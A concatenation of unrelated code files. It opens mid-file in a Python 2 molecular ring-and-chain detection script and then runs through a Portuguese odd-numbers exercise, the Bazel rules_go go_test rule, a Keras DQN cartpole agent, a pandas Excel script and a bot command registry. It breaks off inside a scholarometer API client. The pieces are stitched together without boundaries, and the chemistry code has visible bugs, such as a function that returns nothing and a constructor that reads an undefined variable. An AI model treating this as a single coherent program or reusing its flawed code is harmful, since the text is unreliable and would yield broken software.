exclude_list.append(self) for b in self.bonded_structures: if b in exclude_list: continue bonded.append(b) bonded = bonded + b.get_all_bonded_structures(exclude_list) return bonded def JoinRings(ring1, ring2): joined_ring = Ring() for a in ring1.atoms: joined_ring.atoms.append(a) for b in ring2.atoms: if not joined_ring.has_atom(b): joined_ring.atoms.append(b) return class Chain(object): def __init__(self, first_pair=None): self.atoms = [] self.bonded_structures = [] if first_pair != None: self.atoms.append(pair[0]) self.atoms.append(pair[1]) def type(self): return "chain" def has_atom(self, atom): return self.check_atom(atom) def intersects(self, other): intersects = False for a in self.atoms: if a in other.atoms: intersects = True break return intersects def add(self, other): for atom in other.atoms: if not atom in self.atoms: self.atoms.append(atom) return def print_info(self): for a in self.atoms: print "%2d" % a.id, print "" def find_round_trip_path(self, visited=[], start_atm=None): started_here = False if start_atm == None: self.atoms = sorted(self.atoms, key=lambda atm: len(atm.bonded)) start_atm = self.atoms[0] visited.append(start_atm) started_here = True for bond in start_atm.bonds_core: # Backup visited list to be able to revert to this point visited_0 = [] for v in visited: visited_0.append(v) if bond.b in visited or not bond.b in self.atoms: continue # Partner atom not yet visited, proceed visited.append(bond.b) visited = self.find_round_trip_path(visited, bond.b) # All atoms visited = round path? if len(visited) == len(self.atoms): break # A dead end. Revert & try next bond else: visited = [] for v in visited_0: visited.append(v) #assert len(visited) <= len(self.atoms) if started_here: if len(visited) != len(self.atoms): osio << osio.mr << "WARNING Failed to generate round-trip path (atom order will be compromised)" << endl visited = self.atoms else: if wordy: osio << "Found round-trip path" << endl return visited def order_atoms(self): self.atoms = self.find_round_trip_path(visited=[], start_atm=None) return def get_all_bonded_structures(self, exclude_list=[]): bonded = [] exclude_list.append(self) for b in self.bonded_structures: if b in exclude_list: continue bonded.append(b) bonded = bonded + b.get_all_bonded_structures(exclude_list) return bonded def CreateMolecule(name, atoms, xyz_conv_fact=0.1): molecule = Molecule(0, name) for atom in atoms: gro_atom = Atom(ln='') gro_atom.fragId = atom.fragid gro_atom.fragName = atom.fragname gro_atom.name = atom.name gro_atom.Id = atom.id gro_atom.pos = np.array(atom.xyz)*xyz_conv_fact gro_atom.vel = None molecule.append_atom(gro_atom) return molecule # LOAD ATOMS atoms = [] e,xyz = e_xyz_from_xyz(xyzfile) count = 0 for e,r in zip(e,xyz): count += 1 atoms.append(AtomXyz(e,r,count)) # ESTABLISH BONDING VIA COVALENCE CRITERION osio << osio.mg << "Find bonds using covalence criterion" << endl bond_count = 0 for i in range(len(atoms)): for j in range(i+1, len(atoms)): a = atoms[i] b = atoms[j] dr = np.dot(a.xyz-b.xyz,a.xyz-b.xyz)**0.5 dv = 1.1*(a.covrad+b.covrad) if dr < dv: bond_count += 1 a.bonded.append(b) b.bonded.append(a) print "%d bonds in molecule" % bond_count if leaky: for a in atoms: print "%2s bonded to %d" % (a.e, len(a.bonded)) for a in atoms: if len(a.bonded) == 0: osio << osio.my << "NOTE: Unbonded atom" << a.e << a.id << endl # SEQUENTIALLY SPLIT OFF LIGAND UNITS osio << osio.mg << "Find core using sequential reduction" << endl short_list = [] for a in atoms: short_list.append(a) selection_levels = [] this_level = 0 while True: if leaky: print "Level", this_level print "Short-listed", len(short_list) for a in short_list: a.bonded_short = [] for i in range(len(short_list)): for j in range(i+1, len(short_list)): a = short_list[i] b = short_list[j] dr = np.dot(a.xyz-b.xyz,a.xyz-b.xyz)**0.5 dv = 1.1*(a.covrad+b.covrad) if dr < dv: a.bonded_short.append(b) b.bonded_short.append(a) rm_atoms = [] for s in short_list: if len(s.bonded_short) == 1: rm_atoms.append(s) if len(rm_atoms) == 0: break if leaky: print "Removing", len(rm_atoms) for r in rm_atoms: r.level = this_level for b in r.bonded_short: b.dock_for.append(r) r.docked_to.append(b) short_list.remove(r) if leaky: ofs = open('level_%d.xyz' % this_level, 'w') ofs.write('%d\n\n' % len(short_list)) for s in short_list: ofs.write('%s %+1.7f %+1.7f %+1.7f\n' % (s.e, s.x, s.y, s.z)) ofs.close() this_level += 1 # READ OFF CORE ATOMS core = [] for a in atoms: assert len(a.docked_to) <= 1 docked_atoms = a.get_all_docked_atoms() if wordy: osio << "%-2s bonded to %d, docked to %d, dock for %d/%-2d at level %+d" \ % (a.e, len(a.bonded), len(a.docked_to), len(a.dock_for), len(docked_atoms), a.level) << endl if len(a.docked_to) < 1: core.append(a) print "%d atoms in core" % len(core) # ESTABLISH BONDING AMONG CORE ATOMS osio << osio.mg << "Find core-atom bonds using covalence criterion" << endl bonds = [] for i in range(len(core)): for j in range(i+1, len(core)): a = core[i] b = core[j] dr = np.dot(a.xyz-b.xyz,a.xyz-b.xyz)**0.5 dv = 1.1*(a.covrad+b.covrad) if dr < dv: a.bonded_short.append(b) b.bonded_short.append(a) bond_ab = BondXyz(a,b) bond_ba = BondXyz(b,a) a.add_bond_core(b, bond_ab) b.add_bond_core(a, bond_ba) bonds.append(bond_ab) print "%d bonds in core" % len(bonds) # GENERATE PATHS ALONG CORE BONDS path_cutoff_length = 7 osio << osio.mg << "Find connecting paths (max. length %d)" % path_cutoff_length << endl path_count = 0 for c in core: paths = c.find_paths(length=path_cutoff_length, exclusion_list=[], start_here=True) if wordy: osio << "%2d paths of length <= %d from atom %2d" % (len(paths), path_cutoff_length, c.id) << endl if leaky: for p in paths: p.print_info() path_count += len(paths) osio << "Generated a total of %d bond paths" % path_count << endl # FROM PATHS FIND RING-CONNECTED ATOMS ring_pairs = [] for i in range(len(core)): for j in range(i+1, len(core)): a = core[i] b = core[j] paths_ab = [] for p in a.paths: if p.get_last() == b: paths_ab.append(p) paths_ba = [] for p in b.paths: if p.get_last() == a: paths_ba.append(p) if leaky: print "ID1 %d ID2 %d" % (a.id, b.id) print "a => b: %d" % len(paths_ab) #for p in paths_ab: # p.print_info() print "b => a: %d" % len(paths_ba) #for p in paths_ba: # p.print_info() assert len(paths_ab) == len(paths_ba) if len(paths_ab) == 1: continue has_disjoint_paths = False for k in range(len(paths_ab)): for l in range(k+1, len(paths_ab)): intersects = False p1 = paths_ab[k] p2 = paths_ab[l] b1 = p1.bonds b2 = p2.bonds for bond in b1: if bond in b2: intersects = True if not intersects: has_disjoint_paths = True if has_disjoint_paths: pair = [a,b] ring_pairs.append(pair) if leaky: osio << osio.mg << "Ring pair:" << a.id-1 << b.id-1 << endl # FROM RING PAIRS, FIND RINGS VIA SUCCESSIVE ADDITION osio << osio.mg << "Find rings using set of ring pairs" << endl rings = [] for pair in ring_pairs: new_ring = Ring(first_pair=pair) rings.append(new_ring) i = 0 while i <= len(rings)-1: ring = rings[i] rm_rings = [] for j in range(i+1, len(rings)): other = rings[j] if ring.intersects(other): rm_rings.append(other) ring.add(other) for r in rm_rings: rings.remove(r) i += 1 osio << "Core rings (# = %d)" % len(rings) << endl if wordy: for r in rings: r.print_info() # READ OFF NON-RING ATOMS non_ring_core_atoms = [] for c in core: in_ring = False for r in rings: if r.has_atom(c): in_ring = True if not in_ring: non_ring_core_atoms.append(c) osio << "Non-ring core atoms: %d" % len(non_ring_core_atoms) << endl # ESTABLISH BONDING AMONG NON-RING CORE ATOMS osio << osio.mg << "Find non-ring core-atom bonds using covalence criterion" << endl bonds = [] for i in range(len(non_ring_core_atoms)): for j in range(i+1, len(non_ring_core_atoms)): a = non_ring_core_atoms[i] b = non_ring_core_atoms[j] dr = np.dot(a.xyz-b.xyz,a.xyz-b.xyz)**0.5 dv = 1.1*(a.covrad+b.covrad) if dr < dv: a.bonded_short.append(b) b.bonded_short.append(a) bond_ab = BondXyz(a,b) bond_ba = BondXyz(b,a) a.add_bond_non_ring(b, bond_ab) b.add_bond_non_ring(a, bond_ba) bonds.append(bond_ab) print "%d bonds in non-ring core" % len(bonds) # GENERATE PATHS ALONG NON-RING CORE BONDS path_cutoff_length = 7 osio << osio.mg << "Find connecting non-ring paths (max. length %d)" % path_cutoff_length << endl path_count = 0 for c in non_ring_core_atoms: paths = c.find_paths_non_ring(length=path_cutoff_length, exclusion_list=[], start_here=True) if wordy: print "%2d paths of length <= %d from atom %2d" % (len(paths), path_cutoff_length, c.id) if leaky: for p in paths: p.print_info() path_count += len(paths) osio << "Generated a total of %d non-ring bond paths" % path_count << endl # FROM PATHS FIND NON-RING-CONNECTED ATOMS non_ring_pairs = [] for i in range(len(non_ring_core_atoms)): for j in range(i+1, len(non_ring_core_atoms)): a = non_ring_core_atoms[i] b = non_ring_core_atoms[j] paths_ab = [] for p in a.paths_non_ring: if p.get_last() == b: paths_ab.append(p) paths_ba = [] for p in b.paths_non_ring: if p.get_last() == a: paths_ba.append(p) if leaky: print "ID1 %d ID2 %d" % (a.id, b.id) print "a => b: %d" % len(paths_ab) #for p in paths_ab: # p.print_info() print "b => a: %d" % len(paths_ba) #for p in paths_ba: # p.print_info() assert len(paths_ab) == len(paths_ba) assert len(paths_ab) <= 1 if len(paths_ab) > 0: pair = [a,b] non_ring_pairs.append(pair) if leaky: osio << osio.mg << "Non-ring pair:" << a.id-1 << b.id-1 << endl # FROM NON-RING PAIRS, FIND NON-RINGS (= CHAINS) VIA SUCCESSIVE ADDITION osio << osio.mg << "Find non-ring structures using set of non-ring pairs" << endl chains = [] for pair in non_ring_pairs: new_chain = Chain(first_pair=pair) chains.append(new_chain) i = 0 while i <= len(chains)-1: chain = chains[i] rm_chains = [] for j in range(i+1, len(chains)): other = chains[j] if chain.intersects(other): rm_chains.append(other) chain.add(other) for r in rm_chains: chains.remove(r) i += 1 if len(chains) == 0: for atom in non_ring_core_atoms: new_chain = Chain() new_chain.atoms.append(atom) chains.append(new_chain) osio << "Core chains (# = %d)" % len(chains) << endl if wordy: for c in chains: c.print_info() # REORDER STRUCTURAL ELEMENTS (CORE RINGS & CORE CHAINS) molecule = [] structures = rings + chains for i in range(len(structures)): for j in range(i+1, len(structures)): s1 = structures[i] s2 = structures[j] bond_count = 0 for a in s1.atoms: for b in s2.atoms: dr = np.dot(a.xyz-b.xyz,a.xyz-b.xyz)**0.5 dv = 1.1*(a.covrad+b.covrad) if dr < dv: bond_count += 1 assert bond_count <= 1 if bond_count: s1.bonded_structures.append(s2) s2.bonded_structures.append(s1) start_struct_idx = 0 if len(structures) == 1: pass else: structures = sorted(structures, key=lambda s: len(s.bonded_structures)) while structures[start_struct_idx].bonded_structures == []: molecule.append(structures[start_struct_idx]) if start_struct_idx+1 == len(structures): break start_struct_idx += 1 start_struct = structures[start_struct_idx] docked_structures = start_struct.get_all_bonded_structures(exclude_list=[]) molecule = molecule + [start_struct] + docked_structures # REORDER ATOMS IN EACH STRUCTURE for struct in molecule: print "Structure type %-10s" % ("'%s'" % struct.type()), "(bonded to %d)" % len(struct.bonded_structures) struct.order_atoms() # GENERATE ATOM TYPES osio << osio.mg << "Assign atom types" << endl frag_atom_type_count = {} for atm in atoms: atm.generate_type() frag_atom_type_count[atm.type] = 0 # SORT ATOMS AND ASSIGN FRAGMENT NAMES & IDs osio << osio.mg << "Sort atoms, assign fragment names & IDs" << endl atoms_ordered = [] frag_count = 0 core_count = 0 ligand_count = 0 core_alphabet_index = 0 ligand_alphabet_index = 1 for struct in molecule: # Core atoms frag_count += 1 core_count += 1 ligand_sets = [] # Reset fragment atom-type counter for key in frag_atom_type_count.keys(): frag_atom_type_count[key] = 0 osio << "Core '%s' (size: %d)" % (ALPHABET[core_count-1], len(struct.atoms)) << endl for atm in struct.atoms: atm.fragid = frag_count atm.fragname = 'CO' + ALPHABET[core_count-1] atm.name = atm.type + NUMBERS[frag_atom_type_count[atm.type]] frag_atom_type_count[atm.type] += 1 atoms_ordered.append(atm) docked = atm.get_all_docked_atoms() if len(docked) <= 4: for datm in docked: datm.fragid = frag_count datm.fragname = 'CO' + ALPHABET[core_count-1] datm.name = datm.type + NUMBERS[frag_atom_type_count[datm.type]] atoms_ordered.append(datm) else: ligand_sets.append(docked) # Reset fragment atom-type counter for key in frag_atom_type_count.keys(): frag_atom_type_count[key] = 0 # Ligand atoms for lset in ligand_sets: frag_count += 1 ligand_count += 1 osio << "Ligand '%s' (size: %d)" % (ALPHABET[core_count-1], len(struct.atoms)) << endl for atm in lset: atm.fragid = frag_count atm.fragname = 'LI' + ALPHABET[core_count-1] atm.name = atm.type + NUMBERS[frag_atom_type_count[atm.type]] frag_atom_type_count[atm.type] += 1 atoms_ordered.append(atm) # FIX ATOM IDs atom_count = 0 for atom in atoms_ordered: atom_count += 1 atom.id = atom_count # OUTPUT XYZ if outfile_xyz != '': ofs = open(outfile_xyz, 'w') ofs.write('%d\n\n' % len(atoms_ordered)) for atm in atoms_ordered: if wordy: print atm.e, atm.fragname, atm.fragid, atm.type, atm.name ofs.write('%-2s %+1.7f %+1.7f %+1.7f\n' % (atm.e, atm.x, atm.y, atm.z)) ofs.close() # OUTPUT GRO if outfile_gro != '': molecule = CreateMolecule(molname, atoms_ordered) molecule.write_gro(outfile_gro) EstruturaDeRepeticao/09.py ''' 9. Faça um programa que imprima na tela apenas os números ímpares entre 1 e 50. ''' for j in range(1, 50): if j % 2 == 1: print(j, end=' ') go/private/rules/test.bzl1000+ # Copyright 2014 The Bazel Authors. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. load( "//go/private:context.bzl", "go_context", ) load( "//go/private:common.bzl", "as_list", "asm_exts", "cgo_exts", "go_exts", "pkg_dir", "split_srcs", ) load( "//go/private/rules:binary.bzl", "gc_linkopts", ) load( "//go/private:providers.bzl", "GoArchive", "GoLibrary", "GoSource", "INFERRED_PATH", "get_archive", ) load( "//go/private/rules:transition.bzl", "go_transition_rule", ) load( "//go/private:mode.bzl", "LINKMODE_NORMAL", ) load( "@bazel_skylib//lib:structs.bzl", "structs", ) def _testmain_library_to_source(go, attr, source, merge): source["deps"] = source["deps"] + [attr.library] def _go_test_impl(ctx): """go_test_impl implements go testing. It emits an action to run the test generator, and then compiles the test into a binary.""" go = go_context(ctx) # Compile the library to test with internal white box tests internal_library = go.new_library(go, testfilter = "exclude") internal_source = go.library_to_source(go, ctx.attr, internal_library, ctx.coverage_instrumented()) internal_archive = go.archive(go, internal_source) go_srcs = split_srcs(internal_source.srcs).go # Compile the library with the external black box tests external_library = go.new_library( go, name = internal_library.name + "_test", importpath = internal_library.importpath + "_test", testfilter = "only", ) external_source = go.library_to_source(go, struct( srcs = [struct(files = go_srcs)], embedsrcs = [struct(files = internal_source.embedsrcs)], deps = internal_archive.direct + [internal_archive], x_defs = ctx.attr.x_defs, ), external_library, ctx.coverage_instrumented()) external_source, internal_archive = _recompile_external_deps(go, external_source, internal_archive, [t.label for t in ctx.attr.embed]) external_archive = go.archive(go, external_source) external_srcs = split_srcs(external_source.srcs).go # now generate the main function if ctx.attr.rundir: if ctx.attr.rundir.startswith("/"): run_dir = ctx.attr.rundir else: run_dir = pkg_dir(ctx.label.workspace_root, ctx.attr.rundir) else: run_dir = pkg_dir(ctx.label.workspace_root, ctx.label.package) main_go = go.declare_file(go, path = "testmain.go") arguments = go.builder_args(go, "gentestmain") arguments.add("-output", main_go) if ctx.configuration.coverage_enabled: arguments.add("-coverage") arguments.add( # the l is the alias for the package under test, the l_test must be the # same with the test suffix "-import", "l=" + internal_source.library.importpath, ) arguments.add( "-import", "l_test=" + external_source.library.importpath, ) arguments.add("-pkgname", internal_source.library.importpath) arguments.add_all(go_srcs, before_each = "-src", format_each = "l=%s") ctx.actions.run( inputs = go_srcs, outputs = [main_go], mnemonic = "GoTestGenTest", executable = go.toolchain._builder, arguments = [arguments], ) test_gc_linkopts = gc_linkopts(ctx) if not go.mode.debug: # Disable symbol table and DWARF generation for test binaries. test_gc_linkopts.extend(["-s", "-w"]) # Link in the run_dir global for bzltestutil test_gc_linkopts.extend(["-X", "github.com/bazelbuild/rules_go/go/tools/bzltestutil.RunDir=" + run_dir]) # Now compile the test binary itself test_library = GoLibrary( name = go.label.name + "~testmain", label = go.label, importpath = "testmain", importmap = "testmain", importpath_aliases = (), pathtype = INFERRED_PATH, is_main = True, resolve = None, ) test_deps = external_archive.direct + [external_archive] + ctx.attr._testmain_additional_deps if ctx.configuration.coverage_enabled: test_deps.append(go.coverdata) test_source = go.library_to_source(go, struct( srcs = [struct(files = [main_go])], deps = test_deps, ), test_library, False) test_archive, executable, runfiles = go.binary( go, name = ctx.label.name, source = test_source, test_archives = [internal_archive.data], gc_linkopts = test_gc_linkopts, version_file = ctx.version_file, info_file = ctx.info_file, ) # Bazel only looks for coverage data if the test target has an # InstrumentedFilesProvider. If the provider is found and at least one # source file is present, Bazel will set the COVERAGE_OUTPUT_FILE # environment variable during tests and will save that file to the build # events + test outputs. return [ test_archive, DefaultInfo( files = depset([executable]), runfiles = runfiles, executable = executable, ), OutputGroupInfo( compilation_outputs = [internal_archive.data.file], ), coverage_common.instrumented_files_info( ctx, source_attributes = ["srcs"], dependency_attributes = ["deps", "embed"], extensions = ["go"], ), ] _go_test_kwargs = { "implementation": _go_test_impl, "attrs": { "data": attr.label_list(allow_files = True), "srcs": attr.label_list(allow_files = go_exts + asm_exts + cgo_exts), "deps": attr.label_list(providers = [GoLibrary]), "embed": attr.label_list(providers = [GoLibrary]), "embedsrcs": attr.label_list(allow_files = True), "importpath": attr.string(), "gc_goopts": attr.string_list(), "gc_linkopts": attr.string_list(), "rundir": attr.string(), "x_defs": attr.string_dict(), "linkmode": attr.string(default = LINKMODE_NORMAL), "cgo": attr.bool(), "cdeps": attr.label_list(), "cppopts": attr.string_list(), "copts": attr.string_list(), "cxxopts": attr.string_list(), "clinkopts": attr.string_list(), "_go_context_data": attr.label(default = "//:go_context_data"), "_testmain_additional_deps": attr.label_list( providers = [GoLibrary], default = ["@io_bazel_rules_go//go/tools/bzltestutil"], ), # Workaround for bazelbuild/bazel#6293. See comment in lcov_merger.sh. "_lcov_merger": attr.label( executable = True, default = "@io_bazel_rules_go//go/tools/builders:lcov_merger", cfg = "target", ), }, "executable": True, "test": True, "toolchains": ["@io_bazel_rules_go//go:toolchain"], } go_test = rule(**_go_test_kwargs) go_transition_test = go_transition_rule(**_go_test_kwargs) def _recompile_external_deps(go, external_source, internal_archive, library_labels): """Recompiles some archives in order to split internal and external tests. go_test, like 'go test', splits tests into two separate archives: an internal archive ('package foo') and an external archive ('package foo_test'). The library under test is embedded into the internal archive. The external archive may import it and may depend on symbols defined in the internal test files. To avoid conflicts, the library under test must not be linked into the test binary, since the internal test archive embeds the same sources. Libraries imported by the external test that transitively import the library under test must be recompiled too, or the linker will complain that export data they were compiled with doesn't match the export data they are linked with. This function identifies which archives may need to be recompiled, then declares new output files and actions to recompile them. This is an unfortunately an expensive process requiring O(V+E) time and space in the size of the test's dependency graph for each test. Args: go: go object returned by go_context. external_source: GoSource for the external archive. internal_archive: GoArchive for the internal archive. library_labels: labels for embedded libraries under test. Returns: external_soruce: recompiled GoSource for the external archive. If no recompilation is needed, the original GoSource is returned. internal_archive: recompiled GoArchive for the internal archive. If no recompilation is needed, the original GoSource is returned. """ # If no libraries are embedded in the internal archive, then nothing needs # to be recompiled. if not library_labels: return external_source, internal_archive # Build a map from labels to GoArchiveData. # If none of the librares embedded in the internal archive are in the # dependency graph, then nothing needs to be recompiled. arc_data_list = depset(transitive = [get_archive(dep).transitive for dep in external_source.deps]).to_list() label_to_arc_data = {a.label: a for a in arc_data_list} if all([l not in label_to_arc_data for l in library_labels]): return external_source, internal_archive # Build a depth-first post-order list of dependencies starting with the # external archive. Each archive appears after its dependencies and before # its dependents. # # This is tricky because Starlark doesn't support recursion or while loops. # We simulate a while loop by iterating over a list of 2N elements where # N is the number of archives. Each archive is pushed onto the stack # twice: once before its dependencies are pushed, and once after. # dep_list is the post-order list of dependencies we're building. dep_list = [] # stack is a stack of targets to process. We're done when it's empty. stack = [get_archive(dep).data.label for dep in external_source.deps] # deps_pushed tracks the status of each target. # DEPS_UNPROCESSED means the target is on the stack, but its dependencies # are not. # ON_DEP_LIST means the target and its dependencies have been added to # dep_list. # Non-negative integers are the number of dependencies on the stack that # still need to be processed. # A target is on the stack if its status is DEPS_UNPROCESSED or 0. DEPS_UNPROCESSED = -1 ON_DEP_LIST = -2 deps_pushed = {l: DEPS_UNPROCESSED for l in stack} # dependents maps labels to lists of known dependents. When a target is # processed, its dependents' deps_pushed count is deprecated. dependents = {l: [] for l in stack} # step is a list to iterate over to simulate a while loop. i tracks # iterations. step = [None] * (2 * len(arc_data_list)) i = 0 for _ in step: if len(stack) == 0: break i += 1 label = stack.pop() if deps_pushed[label] == 0: # All deps have been added to dep_list. Append this target to the # list. If a dependent is not waiting for anything else, push # it back onto the stack. dep_list.append(label) for p in dependents.get(label, []): deps_pushed[p] -= 1 if deps_pushed[p] == 0: stack.append(p) continue # deps_pushed[label] == None, indicating we don't know whether this # targets dependencies have been processed. Other targets processed # earlier may depend on them. deps_pushed[label] = 0 arc_data = label_to_arc_data[label] for c in arc_data._dep_labels: if c not in deps_pushed: # Dependency not seen yet; push it. stack.append(c) deps_pushed[c] = None deps_pushed[label] += 1 dependents[c] = [label] elif deps_pushed[c] != 0: # Dependency pushed, not processed; wait for it. deps_pushed[label] += 1 dependents[c].append(label) if deps_pushed[label] == 0: # No dependencies to wait for; push self. stack.append(label) if i != len(step): fail("assertion failed: iterated %d times instead of %d" % (i, len(step))) # Determine which dependencies need to be recompiled because they depend # on embedded libraries. need_recompile = {} for label in dep_list: arc_data = label_to_arc_data[label] need_recompile[label] = any([ dep in library_labels or need_recompile[dep] for dep in arc_data._dep_labels ]) # Recompile the internal archive without dependencies that need # recompilation. This breaks a cycle which occurs because the deps list # is shared between the internal and external archive. The internal archive # can't import anything that imports itself. internal_source = internal_archive.source internal_deps = [dep for dep in internal_source.deps if not need_recompile[get_archive(dep).data.label]] attrs = structs.to_dict(internal_source) attrs["deps"] = internal_deps internal_source = GoSource(**attrs) internal_archive = go.archive(go, internal_source, _recompile_suffix = ".recompileinternal") # Build a map from labels to possibly recompiled GoArchives. label_to_archive = {} i = 0 for label in dep_list: i += 1 recompile_suffix = ".recompile%d" % i # If this library is the internal archive, use the recompiled version. if label == internal_archive.data.label: label_to_archive[label] = internal_archive continue # If this is a library embedded into the internal test archive, # use the internal test archive instead. if label in library_labels: label_to_archive[label] = internal_archive continue # Create a stub GoLibrary and GoSource from the archive data. arc_data = label_to_arc_data[label] library = GoLibrary( name = arc_data.name, label = arc_data.label, importpath = arc_data.importpath, importmap = arc_data.importmap, importpath_aliases = arc_data.importpath_aliases, pathtype = arc_data.pathtype, resolve = None, testfilter = None, is_main = False, ) deps = [label_to_archive[d] for d in arc_data._dep_labels] source = GoSource( library = library, mode = go.mode, srcs = as_list(arc_data.srcs), orig_srcs = as_list(arc_data.orig_srcs), orig_src_map = dict(zip(arc_data.srcs, arc_data._orig_src_map)), cover = arc_data._cover, embedsrcs = as_list(arc_data._embedsrcs), x_defs = dict(arc_data._x_defs), deps = deps, gc_goopts = as_list(arc_data._gc_goopts), runfiles = go._ctx.runfiles(files = arc_data.data_files), cgo = arc_data._cgo, cdeps = as_list(arc_data._cdeps), cppopts = as_list(arc_data._cppopts), copts = as_list(arc_data._copts), cxxopts = as_list(arc_data._cxxopts), clinkopts = as_list(arc_data._clinkopts), cgo_exports = as_list(arc_data._cgo_exports), ) # If this archive needs to be recompiled, use go.archive. # Otherwise, create a stub GoArchive, using the original file. if need_recompile[label]: recompile_suffix = ".recompile%d" % i archive = go.archive(go, source, _recompile_suffix = recompile_suffix) else: archive = GoArchive( source = source, data = arc_data, direct = deps, libs = depset(direct = [arc_data.file], transitive = [a.libs for a in deps]), transitive = depset(direct = [arc_data], transitive = [a.transitive for a in deps]), x_defs = source.x_defs, cgo_deps = depset(direct = arc_data._cgo_deps, transitive = [a.cgo_deps for a in deps]), cgo_exports = depset(direct = list(source.cgo_exports), transitive = [a.cgo_exports for a in deps]), runfiles = source.runfiles, mode = go.mode, ) label_to_archive[label] = archive # Finally, we need to replace external_source.deps with the recompiled # archives. attrs = structs.to_dict(external_source) attrs["deps"] = [label_to_archive[get_archive(dep).data.label] for dep in external_source.deps] return GoSource(**attrs), internal_archive examples/gazebo_cartpole/gazebo_cartpole_v2.py10-100 import gym import keras import numpy as np import random from gym import wrappers from keras.models import Sequential from keras.layers import Dense from keras.optimizers import Adam from collections import deque import gym_gazebo ACTIONS_DIM = 2 OBSERVATIONS_DIM = 4 MAX_ITERATIONS = 10**6 LEARNING_RATE = 0.001 NUM_EPOCHS = 50 GAMMA = 0.99 REPLAY_MEMORY_SIZE = 1000 NUM_EPISODES = 10000 TARGET_UPDATE_FREQ = 100 MINIBATCH_SIZE = 32 RANDOM_ACTION_DECAY = 0.99 INITIAL_RANDOM_ACTION = 1 class ReplayBuffer(): def __init__(self, max_size): self.max_size = max_size self.transitions = deque() def add(self, observation, action, reward, observation2): if len(self.transitions) > self.max_size: self.transitions.popleft() self.transitions.append((observation, action, reward, observation2)) def sample(self, count): return random.sample(self.transitions, count) def size(self): return len(self.transitions) def get_q(model, observation): np_obs = np.reshape(observation, [-1, OBSERVATIONS_DIM]) return model.predict(np_obs) def train(model, observations, targets): # for i, observation in enumerate(observations): # np_obs = np.reshape(observation, [-1, OBSERVATIONS_DIM]) # print "t: {}, p: {}".format(model.predict(np_obs),targets[i]) # exit(0) np_obs = np.reshape(observations, [-1, OBSERVATIONS_DIM]) np_targets = np.reshape(targets, [-1, ACTIONS_DIM]) model.fit(np_obs, np_targets, epochs=1, verbose=0) def predict(model, observation): np_obs = np.reshape(observation, [-1, OBSERVATIONS_DIM]) return model.predict(np_obs) def get_model(): model = Sequential() model.add(Dense(16, input_shape=(OBSERVATIONS_DIM, ), activation='relu')) model.add(Dense(16, input_shape=(OBSERVATIONS_DIM,), activation='relu')) model.add(Dense(2, activation='linear')) model.compile( optimizer=Adam(lr=LEARNING_RATE), loss='mse', metrics=[], ) return model def update_action(action_model, target_model, sample_transitions): random.shuffle(sample_transitions) batch_observations = [] batch_targets = [] for sample_transition in sample_transitions: old_observation, action, reward, observation = sample_transition targets = np.reshape(get_q(action_model, old_observation), ACTIONS_DIM) targets[action] = reward if observation is not None: predictions = predict(target_model, observation) new_action = np.argmax(predictions) targets[action] += GAMMA * predictions[0, new_action] batch_observations.append(old_observation) batch_targets.append(targets) train(action_model, batch_observations, batch_targets) def main(): steps_until_reset = TARGET_UPDATE_FREQ random_action_probability = INITIAL_RANDOM_ACTION # Initialize replay memory D to capacity N replay = ReplayBuffer(REPLAY_MEMORY_SIZE) # Initialize action-value model with random weights action_model = get_model() # Initialize target model with same weights #target_model = get_model() #target_model.set_weights(action_model.get_weights()) env = gym.make('GazeboCartPole-v0') # env = wrappers.Monitor(env, '/tmp/cartpole-experiment-1') for episode in range(NUM_EPISODES): observation = env.reset() for iteration in range(MAX_ITERATIONS): random_action_probability *= RANDOM_ACTION_DECAY random_action_probability = max(random_action_probability, 0.1) old_observation = observation # if episode % 10 == 0: # env.render() if np.random.random() < random_action_probability: action = np.random.choice(range(ACTIONS_DIM)) else: q_values = get_q(action_model, observation) action = np.argmax(q_values) observation, reward, done, info = env.step(action) if done: print ('Episode {}, iterations: {}'.format( episode, iteration )) # print action_model.get_weights() # print target_model.get_weights() #print 'Game finished after {} iterations'.format(iteration) reward = -200 replay.add(old_observation, action, reward, None) break replay.add(old_observation, action, reward, observation) if replay.size() >= MINIBATCH_SIZE: sample_transitions = replay.sample(MINIBATCH_SIZE) update_action(action_model, action_model, sample_transitions) steps_until_reset -= 1 # if steps_until_reset == 0: # target_model.set_weights(action_model.get_weights()) # steps_until_reset = TARGET_UPDATE_FREQ if __name__ == "__main__": main() import pandas as pd import xlrd ''' df = pd.read_excel('hard.xlsx') out = df['字詞名'] output = ['1'] for i in range(len(out)): if len(out[i]) <= 3: output.append(out[i]) #print(len(output)) #print(output) with open('word.txt', 'w') as f: for word in output: f.write("%s\n" % word) ''' df = pd.read_excel('simple.xlsx') print(df) out = df['名詞'] output = ['1'] for i in range(len(df)): output.append(out[i]) print(output) with open('simple.txt', 'w') as f: for word in output: f.write("%s\n" % word)bot/commands/__init__.py1-10 from bot.commands.general import GENERAL_COMMANDS from bot.commands.debug import DEBUG_COMMANDS from bot.commands.admin import ADMIN_COMMANDS as _ADMIN_COMMANDS from config import config as CONFIG COMMANDS = DEBUG_COMMANDS + GENERAL_COMMANDS if CONFIG.APP.DEBUG else GENERAL_COMMANDS ADMIN_COMMANDS = _ADMIN_COMMANDS + COMMANDS __all__ = ( 'COMMANDS', 'ADMIN_COMMANDS', ) """scholarometer.py - single file Python module for accessing scholarometer. Note that this module is designed and tested in Python3. No effort is currently made to support Python 2 """ # pylama:ignore=E128,E501 # TODO: rest of API import logging from urllib.parse import urlunparse, urljoin, quote import requests # External dep from defusedxml.ElementTree import fromstring as xmlparse def _log(): return logging.getLogger('scholarometer') class Config(object): """An instance of this class is an immutable configuration for API call. Currently only our default instance makes sense, so you can just ignore this class. """ DEF_SCHEME = 'http' DEF_SERVER = 'scholarometer.indiana.edu' DEF_ROOT = '/api/' def __init__(self, scheme=None, server=None, root=None): """Set up the immutable config.""" self.scheme = scheme or Config.DEF_SCHEME self.server = server or Config.DEF_SERVER self.root = root or Config.DEF_ROOT self.session = requests.Session() def _get_url(self, path, scheme=None, server=None, root=None): baseurl = urlunparse(( scheme or self.scheme, server or self.server, root or self.root, None, None, None )) return urljoin(baseurl, path) def _log_response(self, resp): _log().info( "[%d]: Got %d bytes [First 8: '%s'] encoding:%s (app:%s)", resp.status_code, len(resp.content), resp.content[:8] if resp.content else '', resp.encoding, 